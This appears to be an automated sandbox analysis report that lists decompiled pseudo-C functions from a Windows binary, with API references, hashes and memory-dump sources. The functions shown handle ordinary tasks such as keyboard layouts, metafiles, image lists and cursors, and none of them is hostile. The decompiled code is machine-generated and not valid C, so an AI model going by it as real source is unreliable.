                                                                                0x00453446
                                                                                0x0045344b
                                                                                0x0045344c
                                                                                0x00453451
                                                                                0x00453454
                                                                                0x0045345e
                                                                                0x004535c0
                                                                                0x004535c8
                                                                                0x004535cb
                                                                                0x004535ce
                                                                                0x004535de
                                                                                0x00453464
                                                                                0x00453473
                                                                                0x0045347c
                                                                                0x0045348f
                                                                                0x00453492
                                                                                0x004535af
                                                                                0x004535b5
                                                                                0x004535bb
                                                                                0x00000000
                                                                                0x00453498
                                                                                0x00453499
                                                                                0x004534a2
                                                                                0x004534a5
                                                                                0x004534b1
                                                                                0x00000000
                                                                                0x004534b7
                                                                                0x004534c9
                                                                                0x004534cf
                                                                                0x004534f9
                                                                                0x00000000
                                                                                0x004534ff
                                                                                0x00453501
                                                                                0x00453502
                                                                                0x00453507
                                                                                0x0045350a
                                                                                0x0045350d
                                                                                0x00453533
                                                                                0x00453546
                                                                                0x0045355e
                                                                                0x0045356c
                                                                                0x0045357f
                                                                                0x0045357f
                                                                                0x0045356c
                                                                                0x00453586
                                                                                0x00453589
                                                                                0x0045358c
                                                                                0x0045359a
                                                                                0x0045359a
                                                                                0x004534f9
                                                                                0x00000000
                                                                                0x004535a2
                                                                                0x004535a2
                                                                                0x004535a6
                                                                                0x004535a6
                                                                                0x004535a6
                                                                                0x00000000
                                                                                0x004534a5
                                                                                0x00453492
                                                                                0x00000000

                                                                                APIs
                                                                                • GetKeyboardLayoutList.USER32(00000040,?,00000000,004535DF,?,02290F1C,?,00453641,00000000,?,00437C4F), ref: 0045348A
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 004534F2
                                                                                • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,0045359B,?,80000002,00000000), ref: 0045352C
                                                                                • RegCloseKey.ADVAPI32(?,004535A2,00000000,?,00000100,00000000,0045359B,?,80000002,00000000), ref: 00453595
                                                                                Strings
                                                                                • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 004534DC
                                                                                • layout text, xrefs: 00453523
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                                • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                                • API String ID: 1703357764-2652665750
                                                                                • Opcode ID: 6947dafba483a025d13b77e74c1a05237ebe01563b900a72a80e2a0971b0ec31
                                                                                • Instruction ID: 8d878b3f35002f07d186a4d1dffd632d93ff78f37112a753d71399f72f713053
                                                                                • Opcode Fuzzy Hash: 6947dafba483a025d13b77e74c1a05237ebe01563b900a72a80e2a0971b0ec31
                                                                                • Instruction Fuzzy Hash: 80414C74A0020DAFDB10DF55C981B9EB7F8EB48305F5144A6E904A7352E738AF44DB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00422900, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 70%
                                                                                			E00422900(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				struct HDC__* _t43;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t77;
				void* _t80;
				void* _t83;
				void* _t85;
				intOrPtr _t86;

				_t83 = _t85;
				_t86 = _t85 + 0xffffffdc;
				_t80 = __edx;
				_t65 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E00402EC8( &_v38, 0x16);
					_t67 =  *((intOrPtr*)(_t65 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t67 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_t43 = E00420F04( &_v38);
					_v18 = _t43;
					_push(0);
					L00406E20();
					_v16 = _t43;
					_push(_t83);
					_push(0x422a3b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
					_v8 = E0040272C(_v12);
					_push(_t83);
					_push(0x422a1b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
						E00420114(_t67);
					}
					E00416268(_t80, 0x16,  &_v38);
					E00416268(_t80, _v12, _v8);
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(E00422A22);
					return E0040274C(_v8);
				}
			}






















                                                                                0x00422901
                                                                                0x00422903
                                                                                0x00422908
                                                                                0x0042290a
                                                                                0x00422910
                                                                                0x00422a47
                                                                                0x00422916
                                                                                0x00422920
                                                                                0x00422925
                                                                                0x00422928
                                                                                0x0042292f
                                                                                0x00422936
                                                                                0x00422940
                                                                                0x00422938
                                                                                0x00422938
                                                                                0x00422938
                                                                                0x00422957
                                                                                0x0042296e
                                                                                0x00422975
                                                                                0x0042297a
                                                                                0x0042297e
                                                                                0x00422980
                                                                                0x00422985
                                                                                0x0042298a
                                                                                0x0042298b
                                                                                0x00422990
                                                                                0x00422993
                                                                                0x004229a9
                                                                                0x004229b4
                                                                                0x004229b9
                                                                                0x004229ba
                                                                                0x004229bf
                                                                                0x004229c2
                                                                                0x004229df
                                                                                0x004229e1
                                                                                0x004229e1
                                                                                0x004229f0
                                                                                0x004229fd
                                                                                0x00422a04
                                                                                0x00422a07
                                                                                0x00422a0a
                                                                                0x00422a1a
                                                                                0x00422a1a

                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,?,000009EC), ref: 00422952
                                                                                • MulDiv.KERNEL32(?,?,000009EC), ref: 00422969
                                                                                • 72E7AC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 00422980
                                                                                • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,00422A3B,?,00000000,?,?,000009EC,?,?,000009EC), ref: 004229A4
                                                                                • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,00422A1B,?,?,00000000,00000000,00000008,?,00000000,00422A3B), ref: 004229D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: BitsFileMeta
                                                                                • String ID: `
                                                                                • API String ID: 858000408-2679148245
                                                                                • Opcode ID: 1767720ad7597bd8d7ece6e99a49d7682111587344853b9fc9378ef0583c8b42
                                                                                • Instruction ID: 2cb1a0d04e077efc4e63360fc705e0fb0881348a5fd4cdbe6f9f670913e1373a
                                                                                • Opcode Fuzzy Hash: 1767720ad7597bd8d7ece6e99a49d7682111587344853b9fc9378ef0583c8b42
                                                                                • Instruction Fuzzy Hash: 8931A874B00218ABDB00EFD5D982AAEB7B8EF08700F514456F904FB681D6789D40C769
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041B790, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 73%
                                                                                			E0041B790() {
				char _v5;
				intOrPtr* _v12;
				char _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t16;
				char _t19;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t24;
				intOrPtr _t34;
				void* _t39;
				intOrPtr _t46;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr _t51;
				void* _t53;
				void* _t55;
				void* _t58;
				void* _t60;
				intOrPtr _t61;

				_t58 = _t60;
				_t61 = _t60 + 0xfffffff0;
				_push(_t39);
				_push(_t55);
				_push(_t53);
				_t16 = GetCurrentThreadId();
				_t47 =  *0x486dcc; // 0x487030
				if(_t16 !=  *_t47) {
					_v20 = GetCurrentThreadId();
					_v16 = 0;
					_t46 =  *0x486c5c; // 0x41036c
					E0040A1A8(_t39, _t46, 1, _t53, _t55, 0,  &_v20);
					E00403D80();
				}
				if( *0x487a00 == 0) {
					_v5 = 0;
					return _v5;
				} else {
					_push(0x487a04);
					L00406840();
					_push(_t58);
					_push(0x41b8a6);
					_push( *[fs:eax]);
					 *[fs:eax] = _t61;
					if( *0x46b4b8 == 0) {
						L5:
						_t19 = 0;
					} else {
						_t34 =  *0x46b4b8; // 0x0
						if( *((intOrPtr*)(_t34 + 8)) > 0) {
							_t19 = 1;
						} else {
							goto L5;
						}
					}
					_v5 = _t19;
					if(_v5 != 0) {
						while(1) {
							_t21 =  *0x46b4b8; // 0x0
							if( *((intOrPtr*)(_t21 + 8)) <= 0) {
								break;
							}
							_t22 =  *0x46b4b8; // 0x0
							_v12 = E00413FA4(_t22, 0);
							_t24 =  *0x46b4b8; // 0x0
							E00413E94(_t24, 0);
							 *[fs:eax] = _t61;
							 *((intOrPtr*)( *_v12 + 0x20))( *[fs:eax], 0x41b859, _t58);
							_pop(_t51);
							 *[fs:eax] = _t51;
							SetEvent( *(_v12 + 4));
						}
						 *0x487a00 = 0;
					}
					_pop(_t48);
					 *[fs:eax] = _t48;
					_push(E0041B8B1);
					_push(0x487a04);
					L00406988();
					return 0;
				}
			}



























                                                                                0x0041b791
                                                                                0x0041b793
                                                                                0x0041b796
                                                                                0x0041b797
                                                                                0x0041b798
                                                                                0x0041b799
                                                                                0x0041b79e
                                                                                0x0041b7a6
                                                                                0x0041b7ad
                                                                                0x0041b7b0
                                                                                0x0041b7ba
                                                                                0x0041b7c7
                                                                                0x0041b7cc
                                                                                0x0041b7cc
                                                                                0x0041b7d8
                                                                                0x0041b8ad
                                                                                0x0041b8ba
                                                                                0x0041b7de
                                                                                0x0041b7de
                                                                                0x0041b7e3
                                                                                0x0041b7ea
                                                                                0x0041b7eb
                                                                                0x0041b7f0
                                                                                0x0041b7f3
                                                                                0x0041b7fd
                                                                                0x0041b80a
                                                                                0x0041b80a
                                                                                0x0041b7ff
                                                                                0x0041b7ff
                                                                                0x0041b808
                                                                                0x0041b80e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041b808
                                                                                0x0041b810
                                                                                0x0041b817
                                                                                0x0041b87c
                                                                                0x0041b87c
                                                                                0x0041b885
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041b81d
                                                                                0x0041b827
                                                                                0x0041b82c
                                                                                0x0041b831
                                                                                0x0041b841
                                                                                0x0041b84c
                                                                                0x0041b851
                                                                                0x0041b854
                                                                                0x0041b877
                                                                                0x0041b877
                                                                                0x0041b887
                                                                                0x0041b887
                                                                                0x0041b890
                                                                                0x0041b893
                                                                                0x0041b896
                                                                                0x0041b89b
                                                                                0x0041b8a0
                                                                                0x0041b8a5
                                                                                0x0041b8a5

                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0041B799
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0041B7A8
                                                                                • RtlEnterCriticalSection.KERNEL32(00487A04,?,?,00000000), ref: 0041B7E3
                                                                                • SetEvent.KERNEL32(?,?,00487A04,?,?,00000000), ref: 0041B877
                                                                                • RtlLeaveCriticalSection.KERNEL32(00487A04,0041B8B1,00487A04,?,?,00000000), ref: 0041B8A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalCurrentSectionThread$EnterEventLeave
                                                                                • String ID: 0pH
                                                                                • API String ID: 130076905-2350025942
                                                                                • Opcode ID: f9fe5419530660c1f6566d743ee702fba88ecfc05ed869f9bd5f3b49b7124f0b
                                                                                • Instruction ID: 700889da0211f51844b0ff2bdf32a2a153439616f77316e0530eecd999da22f0
                                                                                • Opcode Fuzzy Hash: f9fe5419530660c1f6566d743ee702fba88ecfc05ed869f9bd5f3b49b7124f0b
                                                                                • Instruction Fuzzy Hash: 183107346042409FD301EF65DC95B9E7BE8EB49704F6184BAE401D77A1C77C9881CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0043D56C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 31%
                                                                                			E0043D56C(void* __eax) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				char _t19;
				intOrPtr* _t21;
				void* _t23;
				intOrPtr* _t26;
				void* _t28;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x486b30; // 0x487a94
					_t17 =  *0x486b30; // 0x487a94
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L00426088();
					_v8 = _t19;
					_push(_t49);
					_push(0x43d62c);
					_push( *[fs:eax]);
					 *[fs:eax] = _t52;
					_t21 =  *0x486dac; // 0x487c00
					_t23 = E004536BC( *_t21,  *((short*)(__eax + 0x68)));
					_t4 =  &_v8; // 0x43373a
					E004260C0( *_t4, _t23);
					_t26 =  *0x486dac; // 0x487c00
					_t28 = E004536BC( *_t26,  *((short*)(_t39 + 0x68)));
					_t6 =  &_v8; // 0x43373a
					E004260C0( *_t6, _t28);
					_push(0);
					_push(0);
					_push(0);
					_t7 =  &_v8; // 0x43373a
					_push( *_t7);
					L00426114();
					_push( &_v16);
					_push(0);
					L00426124();
					_push(_v12);
					_push(_v16);
					_push(1);
					_t11 =  &_v8; // 0x43373a
					_push( *_t11);
					L00426114();
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x43d633);
					_t12 =  &_v8; // 0x43373a
					_t37 =  *_t12;
					_push(_t37);
					L00426090();
					return _t37;
				}
			}



















                                                                                0x0043d56d
                                                                                0x0043d56f
                                                                                0x0043d573
                                                                                0x0043d57a
                                                                                0x0043d637
                                                                                0x0043d580
                                                                                0x0043d588
                                                                                0x0043d594
                                                                                0x0043d59b
                                                                                0x0043d59d
                                                                                0x0043d59e
                                                                                0x0043d5a3
                                                                                0x0043d5a8
                                                                                0x0043d5a9
                                                                                0x0043d5ae
                                                                                0x0043d5b1
                                                                                0x0043d5b8
                                                                                0x0043d5bf
                                                                                0x0043d5c6
                                                                                0x0043d5c9
                                                                                0x0043d5d2
                                                                                0x0043d5d9
                                                                                0x0043d5e0
                                                                                0x0043d5e3
                                                                                0x0043d5e8
                                                                                0x0043d5ea
                                                                                0x0043d5ec
                                                                                0x0043d5ee
                                                                                0x0043d5f1
                                                                                0x0043d5f2
                                                                                0x0043d5fa
                                                                                0x0043d5fb
                                                                                0x0043d5fd
                                                                                0x0043d605
                                                                                0x0043d609
                                                                                0x0043d60a
                                                                                0x0043d60c
                                                                                0x0043d60f
                                                                                0x0043d610
                                                                                0x0043d617
                                                                                0x0043d61a
                                                                                0x0043d61d
                                                                                0x0043d622
                                                                                0x0043d622
                                                                                0x0043d625
                                                                                0x0043d626
                                                                                0x0043d62b
                                                                                0x0043d62b

                                                                                APIs
                                                                                • 73451AB0.COMCTL32(00000000), ref: 0043D59E
                                                                                  • Part of subcall function 004260C0: 73452140.COMCTL32(:7C,000000FF,00000000,0043D5CE,00000000,0043D62C,?,00000000), ref: 004260C4
                                                                                • 73451680.COMCTL32(:7C,00000000,00000000,00000000,00000000,0043D62C,?,00000000), ref: 0043D5F2
                                                                                • 73451710.COMCTL32(00000000,?,:7C,00000000,00000000,00000000,00000000,0043D62C,?,00000000), ref: 0043D5FD
                                                                                • 73451680.COMCTL32(:7C,00000001,?,0043D695,00000000,?,:7C,00000000,00000000,00000000,00000000,0043D62C,?,00000000), ref: 0043D610
                                                                                • 73451F60.COMCTL32(:7C,0043D633,0043D695,00000000,?,:7C,00000000,00000000,00000000,00000000,0043D62C,?,00000000), ref: 0043D626
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: 7345173451680$7345171073452140
                                                                                • String ID: :7C
                                                                                • API String ID: 821207058-2842626378
                                                                                • Opcode ID: e1f49fb857df6d86e7848a0a3bbfd2da0d430deeafbcccb135daf17bef5f0dac
                                                                                • Instruction ID: b36cca2bb7ba9923877a37914de756c133afd760673c161dd847c69dd507d15e
                                                                                • Opcode Fuzzy Hash: e1f49fb857df6d86e7848a0a3bbfd2da0d430deeafbcccb135daf17bef5f0dac
                                                                                • Instruction Fuzzy Hash: 11215E74B00214AFDB10EBA8DC82F6D73F8EB49B04F5104AAB914DB291DA75AE44CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00426588, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 47%
                                                                                			E00426588(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x487ac1 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A28();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x487aa8; // 0x426588
					 *0x487aa8 = E00426184(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x487aa8(_t27, _t29);
				}
				return _t24;
			}














                                                                                0x00426591
                                                                                0x00426594
                                                                                0x0042659e
                                                                                0x004265c3
                                                                                0x004265cb
                                                                                0x004265eb
                                                                                0x004265f0
                                                                                0x004265fb
                                                                                0x00426606
                                                                                0x00426610
                                                                                0x00426611
                                                                                0x00426612
                                                                                0x00426613
                                                                                0x00426614
                                                                                0x00426615
                                                                                0x0042661f
                                                                                0x00426621
                                                                                0x00426629
                                                                                0x0042662a
                                                                                0x0042662a
                                                                                0x0042662f
                                                                                0x0042662f
                                                                                0x004265a0
                                                                                0x004265a5
                                                                                0x004265b2
                                                                                0x004265bf
                                                                                0x004265bf
                                                                                0x00426639

                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004265E0
                                                                                • GetSystemMetrics.USER32 ref: 004265F5
                                                                                • GetSystemMetrics.USER32 ref: 00426600
                                                                                • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042662A
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                • String ID: DISPLAY$GetMonitorInfoA
                                                                                • API String ID: 2545840971-1370492664
                                                                                • Opcode ID: 346db3d760f1bed7d111d6058735c3d65dc9c258e78e091d81cd604cb5b0847b
                                                                                • Instruction ID: 4e2d9c879a4ed814bed1cbc42e39869fa7f5999004cea3bfa7235e91a67f31a5
                                                                                • Opcode Fuzzy Hash: 346db3d760f1bed7d111d6058735c3d65dc9c258e78e091d81cd604cb5b0847b
                                                                                • Instruction Fuzzy Hash: 7C11E131704320AFD720CF64AC44BAFF7E8EB05710F51082EED4997680DBB4A9548BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00422F84, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 67%
                                                                                			E00422F84(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				int _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				struct HDC__* _t18;
				int _t31;
				int _t34;
				intOrPtr _t41;
				void* _t43;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t16 = __eax;
				_t46 = _t48;
				_t49 = _t48 + 0xfffffbf0;
				_v8 = __edx;
				_t43 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L5:
					return _t16;
				} else {
					_t16 = E00420950(_v8, 0xff,  &_v1044);
					_t34 = _t16;
					if(_t34 == 0) {
						goto L5;
					} else {
						_push(0);
						L00406E20();
						_v12 = _t16;
						_t18 = _v12;
						_push(_t18);
						L00406A58();
						_v16 = _t18;
						_v20 = SelectObject(_v16, _t43);
						_push(_t46);
						_push(0x423033);
						_push( *[fs:eax]);
						 *[fs:eax] = _t49;
						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
						_pop(_t41);
						 *[fs:eax] = _t41;
						_push(0x42303a);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						_t31 = _v12;
						_push(_t31);
						_push(0);
						L00407080();
						return _t31;
					}
				}
			}

















                                                                                0x00422f84
                                                                                0x00422f85
                                                                                0x00422f87
                                                                                0x00422f8f
                                                                                0x00422f92
                                                                                0x00422f96
                                                                                0x0042303a
                                                                                0x0042303f
                                                                                0x00422fa7
                                                                                0x00422fb5
                                                                                0x00422fba
                                                                                0x00422fbe
                                                                                0x00000000
                                                                                0x00422fc0
                                                                                0x00422fc0
                                                                                0x00422fc2
                                                                                0x00422fc7
                                                                                0x00422fca
                                                                                0x00422fcd
                                                                                0x00422fce
                                                                                0x00422fd3
                                                                                0x00422fe0
                                                                                0x00422fe5
                                                                                0x00422fe6
                                                                                0x00422feb
                                                                                0x00422fee
                                                                                0x00422fff
                                                                                0x00423006
                                                                                0x00423009
                                                                                0x0042300c
                                                                                0x00423019
                                                                                0x00423022
                                                                                0x00423027
                                                                                0x0042302a
                                                                                0x0042302b
                                                                                0x0042302d
                                                                                0x00423032
                                                                                0x00423032
                                                                                0x00422fbe

                                                                                APIs
                                                                                  • Part of subcall function 00420950: GetObjectA.GDI32(00000000,00000004), ref: 00420967
                                                                                  • Part of subcall function 00420950: 72E7AEA0.GDI32(00000000,00000000,?,00000028,00000000,00000004,?,000000FF,00000000,00000018,00000000,0042328E,00000000,004233E4,?,00000000), ref: 0042098A
                                                                                • 72E7AC50.USER32(00000000), ref: 00422FC2
                                                                                • 72E7A590.GDI32(?,00000000), ref: 00422FCE
                                                                                • SelectObject.GDI32(?), ref: 00422FDB
                                                                                • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00423033,?,?,?,?,00000000), ref: 00422FFF
                                                                                • SelectObject.GDI32(?,?), ref: 00423019
                                                                                • DeleteDC.GDI32(?), ref: 00423022
                                                                                • 72E7B380.USER32(00000000,?,?,?,?,0042303A,?,00000000,00423033,?,?,?,?,00000000), ref: 0042302D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Object$Select$A590B380ColorDeleteTable
                                                                                • String ID:
                                                                                • API String ID: 980243606-0
                                                                                • Opcode ID: dfb776280a3db5cd346defb787a43f19a76083ef801a939c648a95686998985a
                                                                                • Instruction ID: cdd620e072040bb66a836ce6190bb65582b2fad91901bccb33566f50f955587f
                                                                                • Opcode Fuzzy Hash: dfb776280a3db5cd346defb787a43f19a76083ef801a939c648a95686998985a
                                                                                • Instruction Fuzzy Hash: 3D1163B1E00219ABDB10EFE9DC51AAEB7BCEB09344F4144BAF514F7281D67CAE504B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004536E4, Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E004536E4(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E004536BC(_t19, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, E004071E0(SendMessageA(_t27, 0x84, 0, E00407270(_t31, _t21)), 0x200));
							}
						}
					}
				}
